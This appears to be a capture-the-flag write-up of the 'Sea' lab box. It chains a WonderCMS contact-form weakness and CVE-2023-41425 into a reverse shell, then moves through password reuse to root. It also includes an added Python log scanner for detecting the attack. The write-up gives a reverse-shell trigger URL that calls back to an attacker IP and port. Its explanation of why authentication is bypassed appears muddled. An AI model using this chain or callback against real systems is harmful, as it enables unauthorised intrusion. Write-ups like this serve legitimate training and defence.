Sea
Overview
Sea is an easy Linux box running a PHP-based WonderCMS site. The contact
form makes server-side requests — an SSRF vector — that can be pointed at an
attacker-hosted payload. WonderCMS is vulnerable to CVE-2023-41425, an
authenticated XSS-to-RCE chain; the SSRF bypasses the authentication
requirement, delivering the malicious theme and executing a reverse shell as
www-data. A credential hash discovered in the CMS database cracks offline, and
the recovered password is reused by a system user account. That user has access
to an internal monitoring application running only on localhost, which is
forwarded via SSH and found to be exploitable for root.
Path: WonderCMS SSRF → CVE-2023-41425 RCE → www-data → CMS hash
→ user pivot → internal service → root.
Enumeration
The scan shows SSH on 22 and a web server on 80. The site is PHP-backed.

Browsing the site reveals a mostly static page with a contact form as the key interactive surface:

Testing the contact form shows it makes outbound server-side requests — an SSRF primitive. Submitting a URL pointing to a local listener gets a callback:


Probing the application further turns up a /loginURL redirect and a login
endpoint:


The theme and page structure identify the CMS as WonderCMS by turboblack.

Foothold — CVE-2023-41425 via SSRF
WonderCMS is vulnerable to CVE-2023-41425 — an authenticated theme-upload XSS that achieves RCE by installing a malicious ZIP as a theme. The exploit script from prodigiousMind/CVE-2023-41425 automates the payload. Ordinarily this requires a logged-in admin session, but the contact form SSRF means the server itself — already authenticated as admin — will fetch and trigger the payload:

I generated the exploit payload and hosted it, then submitted the exploit URL into the contact form’s URL field, letting the server-side request deliver it:

The server fetches the payload, installs the malicious theme, and executes it:

With a shell as www-data, the installed theme’s reverse-shell handler is
accessible directly:
http://sea.htb/themes/revshell-main/rev.php?lhost=10.10.14.41&lport=443
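
On the defensive side, a request like the one above stands out in the web server's access log. The following Python is an added example, not part of the original write-up or of WonderCMS: it flags direct requests for PHP files under /themes/ and raises the severity when the query string carries both an address and a port. It assumes combined-format access logs and that legitimate clients never request theme PHP files directly; the sample log lines are constructed.

```python
import ipaddress
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample in "combined" log format (documentation address ranges).
SAMPLE_LOG = """\
192.0.2.10 - - [10/Aug/2024:12:00:01 +0000] "GET /themes/bike/css/style.css HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.10 - - [10/Aug/2024:12:00:09 +0000] "GET /themes/bike/theme.php HTTP/1.1" 403 199 "-" "Mozilla/5.0"
192.0.2.10 - - [10/Aug/2024:12:01:30 +0000] "GET /themes/revshell-main/rev.php HTTP/1.1" 200 0 "-" "curl/8.5.0"
192.0.2.10 - - [10/Aug/2024:12:02:02 +0000] "GET /themes/revshell-main/rev.php?lhost=198.51.100.9&lport=443 HTTP/1.1" 200 0 "-" "curl/8.5.0"
"""

LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3}) ')
THEME_PHP = re.compile(r"^/themes/([^/]+)/(?:.*/)?[^/]+\.php$", re.IGNORECASE)


def _is_ip(value):
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return False


def _is_port(value):
    return value.isascii() and value.isdigit() and 0 < int(value) < 65536


def scan(log_text):
    """Return (severity, client, theme, target) for PHP served from /themes/."""
    findings = []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        url = urlsplit(target)
        hit = THEME_PHP.match(url.path)
        if not hit or status.startswith("4"):
            continue  # not theme PHP, or the server refused the request (4xx)
        values = [v for _, v in parse_qsl(url.query)]
        # An address together with a port in the query is a callback target.
        callback = any(map(_is_ip, values)) and any(map(_is_port, values))
        findings.append(("high" if callback else "medium", client, hit.group(1), target))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(*finding, sep="  ")
```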

User
Enumerating the filesystem from the www-data shell turns up a database file
containing a password hash:


Checking /home reveals the system users:

Cracking the hash offline returns a plaintext password that is reused by one of the system accounts, giving SSH access and the user flag:


Privilege Escalation — Internal Service
From the user session, ss -tlnp or a process listing reveals an internal
web service bound only to localhost:8000:

Forwarding the port locally over SSH to examine it:
$ ssh -L 8000:localhost:8000 <user>@sea.htb

The forwarded service presents a monitoring or analytics web interface:

After analysis, the service is found to be running as root and accepts input that can be abused for command execution:

Root
Exploiting the internal service’s vulnerability yields code execution as root:

Takeaways
- SSRF can substitute for authentication. When the vulnerable server fetches URLs on behalf of the requester, it carries its own session cookies — turning a “requires login” exploit into an unauthenticated one.
- CVE-2023-41425 is a theme-upload RCE in WonderCMS that is trivially weaponized; any internet-exposed WonderCMS admin panel (or SSRF path to one) should be treated as a full compromise vector.